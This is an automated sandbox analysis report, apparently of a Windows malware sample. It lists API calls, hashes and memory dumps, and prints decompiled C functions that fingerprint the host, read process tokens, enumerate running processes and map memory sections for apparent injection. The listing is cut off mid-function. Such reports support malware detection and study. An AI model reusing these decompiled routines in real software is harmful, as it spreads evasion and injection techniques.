0x027712f0
0x027712f4
0x027712fa
0x027712ff
0x02771304
0x02771307
0x0277130a
0x0277130f
0x02771310
0x02771313
0x02771318
0x0277131f
0x02771329
0x0277132b
0x0277132c
0x0277132f
0x0277134b
0x02771351
0x02771355
0x027713a3
0x02771357
0x02771364
0x02771374
0x0277137c
0x0277138e
0x02771392
0x00000000
0x00000000
0x0277137e
0x02771381
0x02771386
0x02771388
0x02771388
0x02771366
0x02771368
0x02771394
0x02771395
0x02771395
0x02771364
0x027713aa

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,02777881,?,00000001,?), ref: 027712F4
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 0277130A
_snwprintf.NTDLL ref: 0277132F
CreateFileMappingW.KERNELBASE(000000FF,0277D234,00000004,00000000,00001000,?), ref: 0277134B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,02777881,?), ref: 0277135D
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 02771374
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02777881), ref: 02771395
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,02777881,?), ref: 0277139D

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: 906850440615aa27268d3abdf846ee494cd5290a99be90eaba1c3fe4a573cbc4
Instruction ID: 62e6b7fd7c446aa46f8dabbd228fd18d6899324cda5a1a0b43432b8487159011
Opcode Fuzzy Hash: 906850440615aa27268d3abdf846ee494cd5290a99be90eaba1c3fe4a573cbc4
Instruction Fuzzy Hash: 0721B472A40204BBEF229F54DC09F9E77B9AF48754F25812AF609E71C0D7709A05CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 05401F12, Relevance: 12.1, APIs: 8, Instructions: 114stringCOMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,0542E0E8,00000000), ref: 05401F40
StrRChrA.SHLWAPI(059585A8,00000000,0000005C), ref: 05401F55
_strupr.NTDLL ref: 05401F6B
lstrlen.KERNEL32(059585A8), ref: 05401F73
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 05401FF3
RtlAddVectoredExceptionHandler.NTDLL(00000000,0540E2DE), ref: 0540201A
GetLastError.KERNEL32(?), ref: 05402034
RtlRemoveVectoredExceptionHandler.NTDLL(042F05B8), ref: 0540204A

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: DescriptorExceptionHandlerSecurityVectored$ConvertCreateErrorEventLastRemoveString_struprlstrlen
String ID:
API String ID: 1098824789-0
Opcode ID: 61bbdc66cb72c17d23b49e1ffde27f79254035d7f5adeb65bffffb20b12c4f3e
Instruction ID: 860f04e2e9b399f2b03424d2f936d7a304395d9a1d8df0e15ad86c8bdbe5d260
Opcode Fuzzy Hash: 61bbdc66cb72c17d23b49e1ffde27f79254035d7f5adeb65bffffb20b12c4f3e
Instruction Fuzzy Hash: C631A5719142349FE7289B759C899FF7FADB708350BA5247AFA02E32C0DA704851CB66

Uniqueness

Uniqueness Score: -1.00%

Function 0277A12A, Relevance: 12.1, APIs: 8, Instructions: 102
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0277A12A(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x277d228; // 0xbd092303
					_v12 = _t59;
				}
				_t64 = _t69;
				E02775B70( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x277d22c ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x277d1f0, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E02775AC5(_v8 + _v8, _t63);
							}
							HeapFree( *0x277d1f0, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x277d1f0, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E02775AC5(_v8 + _v8, _t63);
						}
						HeapFree( *0x277d1f0, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}

0x0277a12a
0x0277a132
0x0277a138
0x0277a13b
0x0277a13e
0x0277a140
0x0277a145
0x0277a145
0x0277a14b
0x0277a14d
0x0277a15a
0x0277a1bb
0x0277a15c
0x0277a161
0x0277a167
0x0277a16c
0x0277a17a
0x0277a17e
0x0277a18d
0x0277a194
0x0277a19b
0x0277a19b
0x0277a1a6
0x0277a1a6
0x0277a17e
0x0277a16c
0x0277a1bd
0x0277a1c3
0x0277a1cd
0x0277a1cf
0x0277a1d4
0x0277a1e3
0x0277a1e7
0x0277a1f2
0x0277a1f9
0x0277a200
0x0277a200
0x0277a20c
0x0277a20c
0x0277a1e7
0x0277a215
0x0277a217
0x0277a21a
0x0277a21c
0x0277a21f
0x0277a222
0x0277a22c
0x0277a230
0x0277a234

APIs

GetUserNameW.ADVAPI32(00000000,027779C7), ref: 0277A161
RtlAllocateHeap.NTDLL(00000000,027779C7), ref: 0277A178
GetUserNameW.ADVAPI32(00000000,027779C7), ref: 0277A185
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,027779C7,?,?,?,?,?,027787DD,?,00000001), ref: 0277A1A6
GetComputerNameW.KERNEL32(00000000,00000000), ref: 0277A1CD
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0277A1E1
GetComputerNameW.KERNEL32(00000000,00000000), ref: 0277A1EE
HeapFree.KERNEL32(00000000,00000000), ref: 0277A20C

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID:
API String ID: 3239747167-0
Opcode ID: ed63c51b92859a951bc1dbdbd955d610a2c34acca35fa0624f3d4070e8bb6046
Instruction ID: 2dd744a3573295083dfc2d65d1d6866972f857ec7b5e41cc630ab7051d1092e5
Opcode Fuzzy Hash: ed63c51b92859a951bc1dbdbd955d610a2c34acca35fa0624f3d4070e8bb6046
Instruction Fuzzy Hash: 3D310D71A40205EFEB11DFA9DC84B6EB7F9FF48204F618869E505E3250E730EA15DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0541C6FE, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON

Download Yara Rule

APIs

NtOpenProcess.NTDLL(?,00000400,?,?), ref: 0541C745
NtOpenProcessToken.NTDLL(?,00000008,?), ref: 0541C758
NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,?), ref: 0541C774

Part of subcall function 054203DD: RtlAllocateHeap.NTDLL(00000000,00000001,054211E1), ref: 054203E9

NtQueryInformationToken.NTDLL(?,00000001,00000000,?,?), ref: 0541C791
memcpy.NTDLL(?,00000000,0000001C), ref: 0541C79E
NtClose.NTDLL(?), ref: 0541C7B0
NtClose.NTDLL(?), ref: 0541C7BA

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: f2156de04f0e937b3dd5750c61b1f6f82f08b67c63b9de31de5c4272acd653f5
Instruction ID: c3ef4959342b62bfda4aaa30f79e37b9b1035614f97cab67836f0ddc42a393d1
Opcode Fuzzy Hash: f2156de04f0e937b3dd5750c61b1f6f82f08b67c63b9de31de5c4272acd653f5
Instruction Fuzzy Hash: 0421E4B2A10229BBDB119F95CC85ADEBFBDEF08740F104066F905E6150D7B19A449FA0

Uniqueness

Uniqueness Score: -1.00%

Function 027711A9, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E027711A9(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E027775C4(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E02774C31(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x027711b6
0x027711b7
0x027711b8
0x027711b9
0x027711ba
0x027711be
0x027711c5
0x027711d4
0x027711d7
0x027711da
0x027711e1
0x027711e4
0x027711e7
0x027711ea
0x027711ed
0x027711f8
0x027711fa
0x02771203
0x0277120b
0x0277120d
0x0277121f
0x02771229
0x0277122d
0x0277123c
0x02771240
0x02771249
0x02771251
0x02771251
0x02771253
0x02771253
0x0277125b
0x02771261
0x02771265
0x02771265
0x02771270

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 027711F0
NtOpenProcessToken.NTDLL(00000000,00000008,00000000), ref: 02771203
NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 0277121F

Part of subcall function 027775C4: RtlAllocateHeap.NTDLL(00000000,00000000,02775068), ref: 027775D0

NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 0277123C
memcpy.NTDLL(00000000,00000000,0000001C), ref: 02771249
NtClose.NTDLL(00000000), ref: 0277125B
NtClose.NTDLL(00000000), ref: 02771265

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: f1016d1cedca60fb3011a97c8a6ada21b7e5eb137c8c8fbb1668ff81f591159b
Instruction ID: 16e0feb07643f7a596d768b662c05d3924a8c41222c6e96c217d5dfe1accfa2c
Opcode Fuzzy Hash: f1016d1cedca60fb3011a97c8a6ada21b7e5eb137c8c8fbb1668ff81f591159b
Instruction Fuzzy Hash: C321E5B2A00218BBDF029FA5CC85ADEBFBDEF18744F108466F905E6150D7719A54DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0540E529, Relevance: 9.1, APIs: 6, Instructions: 94threadmemorynativeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 0540E554
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 0540E561
NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 0540E5ED
GetModuleHandleA.KERNEL32(00000000), ref: 0540E5F8
RtlImageNtHeader.NTDLL(00000000), ref: 0540E601
RtlExitUserThread.NTDLL(00000000), ref: 0540E616

Part of subcall function 0541067D: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,0540E58F,?), ref: 05410685
Part of subcall function 0541067D: GetVersion.KERNEL32 ref: 05410694
Part of subcall function 0541067D: GetCurrentProcessId.KERNEL32 ref: 054106A3
Part of subcall function 0541067D: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 054106C0

Part of subcall function 05414213: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,00000001,0540E59D,?,00000000,?,?,?,?,?,0540E59D,?), ref: 05414265
Part of subcall function 05414213: memcpy.NTDLL(?,?,?,?,?,?,?,?,0540E59D,?), ref: 054142F6
Part of subcall function 05414213: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?,?,0540E59D), ref: 05414311

Part of subcall function 0541E943: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,05417661), ref: 0541E969

Part of subcall function 05406E6C: OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,?,?,0540398A,00000000,00000000,00000000,0542E140,?,00000000,05407F62,0542E140), ref: 05406E87
Part of subcall function 05406E6C: IsWow64Process.KERNEL32(?,0542E140,?,00000000,?,?,0540398A,00000000,00000000,00000000,0542E140,?,00000000,05407F62,0542E140,00000000), ref: 05406E98
Part of subcall function 05406E6C: FindCloseChangeNotification.KERNELBASE(?,?,?,0540398A,00000000,00000000,00000000,0542E140,?,00000000,05407F62,0542E140,00000000,?,?,0542137E), ref: 05406EAB

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Process$CreateFileModuleOpenThreadTimeVirtual$AllocChangeCloseCurrentEventExitFindFreeHandleHeaderHeapImageInformationNameNotificationQuerySystemUserVersionWow64memcpy
String ID:
API String ID: 1973333951-0
Opcode ID: 0f484739466215895be2e8833a145df873c6884a372cfb39546618d432976293
Instruction ID: a64e0dbec86d8f7ef6868edeef7121f1a92cbbbbba3afeee39b6306fe67e3898
Opcode Fuzzy Hash: 0f484739466215895be2e8833a145df873c6884a372cfb39546618d432976293
Instruction Fuzzy Hash: AE31C471A04224AFC725AFA4D885EFFBB79FB40740B65497AF502D7281EA30C960C791

Uniqueness

Uniqueness Score: -1.00%

Function 027731DD, Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E027731DD() {
				char _v264;
				void* _v300;
				void* _t5;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t5 = CreateToolhelp32Snapshot(2, 0); // executed
				_t17 = _t5;
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x277d230; // 0x27ba5a8
						_t2 = _t9 + 0x277edf8; // 0x73617661
						_push( &_v264);
						if( *0x277d0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						FindCloseChangeNotification(_t17); // executed
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x027731e8
0x027731ed
0x027731f2
0x027731f6
0x02773200
0x02773231
0x02773207
0x0277320c
0x02773219
0x02773222
0x02773239
0x02773224
0x0277322c
0x00000000
0x0277322c
0x0277323a
0x0277323b
0x00000000
0x0277323b
0x00000000
0x02773235
0x02773241
0x02773246

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 027731ED
Process32First.KERNEL32(00000000,?), ref: 02773200
Process32Next.KERNEL32(00000000,?), ref: 0277322C
FindCloseChangeNotification.KERNELBASE(00000000), ref: 0277323B

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
String ID:
API String ID: 3243318325-0
Opcode ID: 5ab046cc049f05069c7e9e13a0e2bb1081c90acf8621a858e8782ff2f49cec76
Instruction ID: 3057c6fdfbe5f1fdfb94118fff3507854f4ffebce7ad06f5509d86a7cb6272af
Opcode Fuzzy Hash: 5ab046cc049f05069c7e9e13a0e2bb1081c90acf8621a858e8782ff2f49cec76
Instruction Fuzzy Hash: 81F0B4326001A46BDF21B6669C49EEB77ACDFD5710F0100E1E915E3000EB38DA5ADAA1

Uniqueness

Uniqueness Score: -1.00%

Function 05415E21, Relevance: 4.7, APIs: 3, Instructions: 168librarynativeloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(6F57775A,00000318), ref: 05415E46
NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 05415E62

Part of subcall function 054203DD: RtlAllocateHeap.NTDLL(00000000,00000001,054211E1), ref: 054203E9

Part of subcall function 05422AAC: GetProcAddress.KERNEL32(6F57775A,00000000), ref: 05422AD5
Part of subcall function 05422AAC: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,05415EA3,00000000,00000000,00000028,00000100), ref: 05422AF7

StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 05415FCC

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: AddressProcWow64$AllocateHeapInformationMemory64Process64QueryReadVirtual
String ID:
API String ID: 3547194813-0
Opcode ID: 8ff109f151a795e0de8fabacdc14895d35ffd7ca3886280b4ba646f952538dd9
Instruction ID: 4efaf53cf38856247dd47904f05710336a3cfa233a922bb92ce7330b9348d1ad
Opcode Fuzzy Hash: 8ff109f151a795e0de8fabacdc14895d35ffd7ca3886280b4ba646f952538dd9
Instruction Fuzzy Hash: D2613C71A0021AAFDB14DFA9C980BEEBBB5FF48304F11405AED19E7645DB70E950CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 05410D8D, Relevance: 4.6, APIs: 3, Instructions: 56librarynativeloaderCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 05410DA1
GetProcAddress.KERNEL32(6F57775A), ref: 05410DC9
NtWow64QueryInformationProcess64.NTDLL(?,00000000,?,00000030,00000000,?,00001000,00000000), ref: 05410DE7

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: AddressInformationProcProcess64QueryWow64memset
String ID:
API String ID: 2968673968-0
Opcode ID: 89fb1183848f41dae822f2d1d262e50708776869ac0cc9fb07517e01b8455360
Instruction ID: 82e13f728d3c8874faa9d09f6e088c69c0cf7c715db8bc1e2394e70d52f9b456
Opcode Fuzzy Hash: 89fb1183848f41dae822f2d1d262e50708776869ac0cc9fb07517e01b8455360
Instruction Fuzzy Hash: 2C119131A10229AFDB24DB55DC4AFEE7BB9BB44700F444029FD09E7290DB70E915CB64

Uniqueness

Uniqueness Score: -1.00%

Function 02774F73, Relevance: 3.1, APIs: 2, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E02774F73(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E027734D0(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x02774f7c
0x02774f83
0x02774f84
0x02774f85
0x02774f86
0x02774f87
0x02774f98
0x02774f9c
0x02774fb0
0x02774fb3
0x02774fb6
0x02774fbd
0x02774fc0
0x02774fc7
0x02774fca
0x02774fcd
0x02774fd0
0x02774fd5
0x02775010
0x02774fd7
0x02774fda
0x02774fe0
0x02774fe5
0x02774fe9
0x02775007
0x02774feb
0x02774ff2
0x02775000
0x02775000
0x02774fe9
0x02775018

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000,0277416E), ref: 02774FD0

Part of subcall function 027734D0: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,02774FE5,00000002,00000000,?,?,00000000,?,?,02774FE5,00000000), ref: 027734FD

memset.NTDLL ref: 02774FF2

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: Section$CreateViewmemset
String ID:
API String ID: 2533685722-0
Opcode ID: db69f8bf565353c54f1ead48bb6a05488d2e09908a1701edea36ea8a2536738b
Instruction ID: 666f52937a9e089713f756cc91e84e814e63c5d32f45c17c8997c7d7e80f4dcf
Opcode Fuzzy Hash: db69f8bf565353c54f1ead48bb6a05488d2e09908a1701edea36ea8a2536738b
Instruction Fuzzy Hash: 9D2108B2D00209AFDB11DFA9C8849EEFBB9EB48354F508469E605F7210D731AA44DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 05422AAC, Relevance: 3.0, APIs: 2, Instructions: 35librarynativeloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(6F57775A,00000000), ref: 05422AD5
NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,05415EA3,00000000,00000000,00000028,00000100), ref: 05422AF7

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: AddressMemory64ProcReadVirtualWow64
String ID:
API String ID: 752694512-0
Opcode ID: 0c8a877b02de234c921848a911e3d5555b9589a1dc5491b78ae21b52a83e27b3
Instruction ID: bf434426a8e196a694b3d080ea5098613086ee4e211f320b3ca36b97edc10830
Opcode Fuzzy Hash: 0c8a877b02de234c921848a911e3d5555b9589a1dc5491b78ae21b52a83e27b3
Instruction Fuzzy Hash: 89F04975510125BFCB2ACF86DC45CEABFBEFB94340780406AF504C2220DB70EA61DB20

Uniqueness

Uniqueness Score: -1.00%

Function 027734D0, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E027734D0(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x027734e2
0x027734e8
0x027734f6
0x027734fd
0x02773502
0x02773508
0x00000000
0x02773509
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,02774FE5,00000002,00000000,?,?,00000000,?,?,02774FE5,00000000), ref: 027734FD

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: 1164dca9dffaa6dc80c1395e48b33848637f7dfdcdef79fe3af81ec435012d00
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: A6F01CB690020CBFEB119FB5CC89CAFBBBDEB44294F104979B552E5090E6319E089A60

Uniqueness

Uniqueness Score: -1.00%

Function 05405E8A, Relevance: 1.5, APIs: 1, Instructions: 33nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,0542E260), ref: 05405EA1

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 84a2ab95489bb4bb2445204af3fdc8022031bb0e5ba39d0f41d8047212064b0f
Instruction ID: 615b6b09160f01ad0e9ca91ec20279f520ba151343ee40109ef610b2b1a2adc9
Opcode Fuzzy Hash: 84a2ab95489bb4bb2445204af3fdc8022031bb0e5ba39d0f41d8047212064b0f
Instruction Fuzzy Hash: 4CF03A313102259B8734DB55C845DEBBBBAFB057517605465E946DB290D630E906CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 02773CC4, Relevance: 33.3, APIs: 22, Instructions: 263
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E02773CC4(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, signed int _a20) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* __ebx;
				void* __edi;
				long _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				void* _t70;
				intOrPtr _t71;
				int _t74;
				void* _t75;
				intOrPtr _t76;
				int _t79;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr _t87;
				void* _t89;
				void* _t92;
				intOrPtr _t96;
				intOrPtr _t100;
				intOrPtr* _t102;
				void* _t108;
				intOrPtr _t113;
				signed int _t117;
				char** _t119;
				int _t122;
				signed int _t124;
				intOrPtr* _t125;
				intOrPtr* _t127;
				intOrPtr* _t129;
				intOrPtr* _t131;
				intOrPtr _t134;
				intOrPtr _t137;
				int _t140;
				intOrPtr _t141;
				int _t144;
				void* _t145;
				void* _t146;
				intOrPtr _t147;
				void* _t156;
				int _t157;
				void* _t158;
				void* _t159;
				void* _t160;
				intOrPtr _t161;
				void* _t163;
				long _t167;
				intOrPtr* _t168;
				intOrPtr* _t171;
				void* _t172;
				void* _t174;
				void* _t175;
				void* _t180;

				_t156 = __edx;
				_t146 = __ecx;
				_t62 = __eax;
				_t145 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t62 = GetTickCount();
				}
				_t63 =  *0x277d018; // 0x2a8ae8b0
				asm("bswap eax");
				_t64 =  *0x277d014; // 0x5cb11ae7
				asm("bswap eax");
				_t65 =  *0x277d010; // 0x15dc9586
				asm("bswap eax");
				_t66 =  *0x277d00c; // 0x69ab8210
				asm("bswap eax");
				_t67 =  *0x277d230; // 0x27ba5a8
				_t3 = _t67 + 0x277e622; // 0x74666f73
